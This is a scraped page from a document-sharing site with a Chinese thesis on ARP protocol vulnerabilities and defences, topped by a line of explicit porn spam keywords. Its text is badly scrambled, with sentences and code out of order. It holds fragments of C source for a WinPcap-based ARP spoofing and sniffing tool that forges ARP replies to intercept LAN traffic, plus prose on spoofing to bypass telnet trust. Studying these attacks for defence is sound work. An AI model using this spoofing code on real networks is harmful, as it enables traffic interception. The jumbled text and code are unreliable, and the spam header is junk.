freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

正文內(nèi)容

arp協(xié)議漏洞及安全防范-wenkub.com

2025-06-04 06:56 本頁面
   

【正文】 memcpy(sendbuf+sizeof(eth),amp。 =inet_addr()。 =6。 [k]=0x00。k6。 int k。printf(*2HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\IPEnableRouter==0x1\n)。 printf(* Shock 3 Shock if firstip == secondip != your own ip *\n)。 printf(* Get the mac address from firstip to secondip *\n)。char msg[50]。UCHAR mmac[6]={0},fmac[6]={0},smac[6]={0}。}IPHDR,*PIPHDR。 unsigned char proto。 unsigned short total_len。 unsigned long arp_tpa。 unsigned short arp_opt。typedef struct arphdr //ARP幀頭{ unsigned short arp_hdr。微電子學(xué)與計算機(jī),2004,21(4):1012[19] [20] 佚名. 詳談?wù){(diào)用winpcap驅(qū)動寫arp多功能工具. evers/articles/,20020911[21] 佚名. 手把手教你玩轉(zhuǎn)ARP包. . 20040531[22] Sean Introduction To ARP Spoofing.,2001[23] DOUGLAS E with TCP/IP[M]. 北京:清華大學(xué)出版社,1998附錄:ARP攻擊程序源代碼include include include include include include cstdlibpragma ment(lib,ws2_32)pragma ment(lib,packet)define ETH_IP 0x0800define ETH_ARP 0x0806define ARP_REQUEST 0x0001define ARP_REPLY 0x0002define ARP_HARDWARE 0x0001define max_num_adapter 10pragma pack(push,1)typedef struct ethdr //以太網(wǎng)幀頭{ unsigned char eh_dst[6]。有了他們,我大學(xué)的生活充滿了精彩和快樂,他們是我一生難忘的朋友。陸老師一絲不茍的作風(fēng),嚴(yán)謹(jǐn)求實的態(tài)度,踏踏實實的精神,不僅授我以知識,而且教我如何做人做事的道理,雖歷時一載,卻給以終生受益無窮之道。現(xiàn)在的網(wǎng)絡(luò)安全問題很嚴(yán)重,病毒泛濫,黑客攻擊、有害信息傳播層出不窮,這些問題技術(shù)復(fù)雜,原因眾多,有待我們進(jìn)一步研究,來保護(hù)好這個已經(jīng)日益滲透到我們生活和工作中的網(wǎng)絡(luò)。如果多種方案配合使用,就可以最大限度的杜絕ARP攻擊的出現(xiàn),保護(hù)好自己所在的網(wǎng)絡(luò)。ARP高速緩存是其運(yùn)行的關(guān)鍵,我們可以用arp 命令來對高速緩存進(jìn)行檢查和操作。界面如下: 圖41 功能界面然后輸入你要選擇的功能進(jìn)入相關(guān)功能。 PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp))。 memcpy(sendbuf,amp。 memcpy(,smac,6)。 memcpy(,fmac,6)。首先獲得指定的兩臺主機(jī)(假設(shè)為 A 和 B)的MAC地址,然后向A發(fā)送ARP Reply數(shù)據(jù)報,其中的源IP地址為B的IP地址,但是源MAC地址卻是本地主機(jī)的MAC地址,這樣主機(jī)A就會認(rèn)為主機(jī)B的MAC地址是本地主機(jī)的MAC地址,所以主機(jī)A發(fā)送到主機(jī)B的數(shù)據(jù)報都發(fā)送到本地主機(jī)了。arp,sizeof(arp))。 } } memset(sendbuf,0,sizeof(sendbuf))。 break。 for(k=0。 =htonl(myip)。 =htons(ETH_IP)。 } if(fun==2) [5]=0xfe。以下為相關(guān)代碼實現(xiàn): for(k=0。而對于一個嗅探程序,它不會發(fā)送任何數(shù)據(jù),但是當(dāng)它安裝在一臺正常的局域網(wǎng)內(nèi)的計算機(jī)上的時候會產(chǎn)生一些數(shù)據(jù)流。arp,sizeof(arp))。 memset(sendbuf,0,sizeof(sendbuf))。 =4。以下為相關(guān)代碼: =htons(ETH_ARP)。 最后介紹下5個自定義函數(shù): int getmine() //發(fā)送ARP Request數(shù)據(jù)報,請求獲得本地主機(jī)的mac地址; void getdata(LPPACKET lp,int op) //接受數(shù)據(jù)報,并分類處理數(shù)據(jù)報; DWORD WINAPI sniff(LPVOID no) //將網(wǎng)絡(luò)適配器設(shè)置為混雜模式,接收所有流過的數(shù)據(jù)報; DWORD WINAPI sendRequest(LPVOID no) //發(fā)送ARP Request數(shù)據(jù)報,請求獲得指定IP的MAC地址;DWORD WINAPI sendReply(LPVOID no) //發(fā)送ARP Reply進(jìn)行ARP攻擊,或是更新主機(jī)的ARP緩存。這樣主線程和從屬線程就可以共享數(shù)據(jù)。在任何情況下,Windows根據(jù)需要動態(tài)延長堆棧的大小。 16 CreateThread函數(shù)HANDLE CreateThread ( LPSECURITY_ATTRIBUTES lpThreadAttributes, // pointer to security attributes DWORD dwStackSize, // initial thread stack size LPTHREAD_START_ROUTINE lpStartAddress, // pointer to thread function LPVOID lpParameter, // argument for new thread DWORD dwCreationFlags, // creation flags LPDWORD lpThreadId // pointer to receive thread ID);第一個參數(shù)是指向SECURITY_ATTRIBUTES型態(tài)的結(jié)構(gòu)的指針。 13 BOOLEAN PacketSetHwFilter(LPADAPTER AdapterObject,ULONG Filter) 為接收到的數(shù)據(jù)報設(shè)置硬件過濾規(guī)則。 9 LPADAPTER PacketOpenAdapter(LPTSTR AdapterName) 打開一個網(wǎng)絡(luò)適配器。 7 BOOLEAN PacketGetStats(LPADAPTER AdapterObject,struct bpf_stat *s) 返回幾個關(guān)于當(dāng)前捕獲報告的統(tǒng)計信息。 4 BOOLEAN PacketGetAdapterNames(LPSTR pStr,PULONG BufferSize) 返回可以得到的網(wǎng)絡(luò)適配器列表及描述。 下面,介紹下程序中用到的函數(shù)原型: 1 LPPACKET PacketAllocatePacket(void) 如果運(yùn)行成功,返回一個_PACKET結(jié)構(gòu)的指針,否則返回NULL。 unsigned short checksum。 unsigned short ident。}。 unsigned char arp_sha[6]。 unsigned short arp_pro。 unsigned char eh_src[6]。要想對方的操作系統(tǒng)不提醒用戶IP沖突,這涉及到操作系統(tǒng)內(nèi)核檢測IP方面的技術(shù),超出了本文討論范圍,在此不作討論。其間,你就可以監(jiān)聽它們通信的各種數(shù)據(jù)報了。需要強(qiáng)調(diào)的是在某些局域網(wǎng)(如以太網(wǎng))內(nèi),數(shù)據(jù)報的發(fā)送與接收是基于硬件地址的,這是我們實現(xiàn)攻擊的基礎(chǔ)?,F(xiàn)在就以本地主機(jī)的名義(本地主機(jī)的IP和MAC)向指定IP網(wǎng)段內(nèi)的所有主機(jī)發(fā)送31位偽廣播地址(FF:FF:FF:FF:FF:FE)的ARP Request數(shù)據(jù)報,在此我們選擇31位偽廣播地址,是因為絕大多數(shù)的系統(tǒng)在嗅探時都會對它做出回應(yīng)。理論上,嗅探程序是不可能被檢測出來的,因為嗅探程序是一種被動的接收程序,屬于被動觸發(fā)的,它只會收集數(shù)據(jù)包,而不發(fā)送出任何數(shù)據(jù),盡管如此,嗅探程序有時候還是能夠被檢測出來的。以本地主機(jī)的名義(本地主機(jī)的IP和MAC)向指定IP網(wǎng)段內(nèi)的所有主機(jī)發(fā)送廣播(FF:FF:FF:FF:FF:FF)ARP Request數(shù)據(jù)報,處于開機(jī)狀態(tài)的主機(jī)就會發(fā)送ARP Reply數(shù)據(jù)報,這樣就可以獲得當(dāng)前存活主機(jī)的列表。[6] 概要設(shè)計首先,在網(wǎng)絡(luò)編程中的第一件事就是獲得本地主機(jī)的MAC地址及相關(guān)網(wǎng)絡(luò)設(shè)置。WinPcap充分考慮了各種性能和效率的優(yōu)化,在內(nèi)核層實現(xiàn)了數(shù)據(jù)包的捕獲和過濾。它是基于Libpcap而設(shè)計的。WinPcap包括三部分的內(nèi)容。WinPcap(windows packet capture)是windows平臺下一個專業(yè)網(wǎng)絡(luò)數(shù)據(jù)包捕獲開發(fā)包。本攻擊工具根據(jù)所選擇的功能,生成相應(yīng)的ARP包,并設(shè)置網(wǎng)絡(luò)適配器為混雜模式,再創(chuàng)建一個線程用來抓捕網(wǎng)絡(luò)上的數(shù)據(jù)包,這樣就可以監(jiān)測流經(jīng)本地網(wǎng)絡(luò)適配器的數(shù)據(jù)包了。而且該方案在不同系統(tǒng)中的實現(xiàn)方法不一樣,而且某些系統(tǒng)根本不能實現(xiàn)。也就是指定局域網(wǎng)內(nèi)部的一臺機(jī)器作為ARP服務(wù)器,專門保存并且維護(hù)可信范圍內(nèi)的所有主機(jī)的IP地址與MAC地址映射記錄。1/300:e0:4c:33:33:331/2100:e0:4c:22:22:221/1100:e0:4c:11:11:11port1destmac/routethe00:e0:4c:33:33:33addlocksecurewasmacportlistadded00:e0:4c:11:11:111/1Console 網(wǎng)絡(luò)用戶如果擅自改動本機(jī)網(wǎng)卡的MAC地址,該機(jī)器的網(wǎng)絡(luò)訪問將因其MAC地址被交換機(jī)認(rèn)定為非法而無法實現(xiàn)上網(wǎng),自然也就不會對局域網(wǎng)造成干擾了。這樣可以極大程度上避免非法用戶使用arp攻擊或盜用合法用戶的IP地址進(jìn)行流量的盜取。s后面即可。a命令,具體如下: 圖35 獲得網(wǎng)關(guān)IP地址和MAC地址,因用戶所在的區(qū)域、樓體和交換機(jī)不同,其對應(yīng)網(wǎng)關(guān)的IP地址和MAC地址也不相同。更為重要的是我們知道了這些攻擊方法的危害性,我們就可以采取相應(yīng)的防御辦法。 ,他可以開始telnet到主機(jī)的23口。 ,現(xiàn)在每臺主機(jī)都知道了,,一個ARP攻擊完成了,但是。 。路由器也會把初始數(shù)據(jù)報向它的目的地轉(zhuǎn)發(fā)?,F(xiàn)在就涉及到另外一種攻擊方式―ICMP重定向。 5. 主機(jī)更新了arp表中關(guān)于主機(jī)C的IPMAC對應(yīng)關(guān)系。這樣你就可以通過虛假的ARP響應(yīng)包來修改主機(jī)A上的動態(tài)ARP緩存達(dá)到攻擊的目的。在機(jī)器C癱瘓掉的同時,,這樣就可以成功的通過23端口telnet到機(jī)器A上面,而成功的繞過防火墻的限制。而他必須要使用telnet來進(jìn)入主機(jī)A,這個時候他應(yīng)該如何處理呢?我們這樣考慮,入侵者必須讓主機(jī)A相信主機(jī)B就是主機(jī)C,如果主機(jī)A和主機(jī)C之間的信任關(guān)系是建立在IP地址之上的。然后發(fā)出該IP包。通常是動態(tài)的轉(zhuǎn)換表(該arp表可以手工添加靜態(tài)條目)。由于ARP 協(xié)議是無狀態(tài)的, ARP 協(xié)議并未規(guī)定,主機(jī)在未受到查詢時就不能發(fā)送ARP 應(yīng)答包, 任何主機(jī)即使在沒有請求的時候也可以做出應(yīng)答, 而且許多系統(tǒng)會接受未請求的ARP 響應(yīng), 并用其信息篡改其緩存。這個問題是不可避免的,因為正是由于主機(jī)不知道通信對方的MAC地址,才需要進(jìn)行ARP廣播請求的。這是ARP協(xié)議的特色之一,但也是安全問題之一。經(jīng)過ARP協(xié)議解析IP地址之后,主機(jī)會在緩存中保存IP地址和MAC地址的映射條目,此后再進(jìn)行數(shù)據(jù)交換時只要從緩存中讀取映射條目即可。此ARP請求數(shù)據(jù)包里包括源主機(jī)的IP地址、硬件地址、以及目的主機(jī)的IP地址。 我們把ARP協(xié)議的原理網(wǎng)分別用下面兩張圖表示,如圖23和圖24所示 開始監(jiān)聽信道的ARP回應(yīng)封裝ARP報文并發(fā)送收到一個ARP請求定期廣播ARP請求目標(biāo)主機(jī)存入本機(jī)ARP緩存并定期更新廣播ARP請求查詢地址綁定無有 圖23 同網(wǎng)段內(nèi)ARP工作原
點擊復(fù)制文檔內(nèi)容
規(guī)章制度相關(guān)推薦
文庫吧 www.dybbs8.com
備案圖片鄂ICP備17016276號-1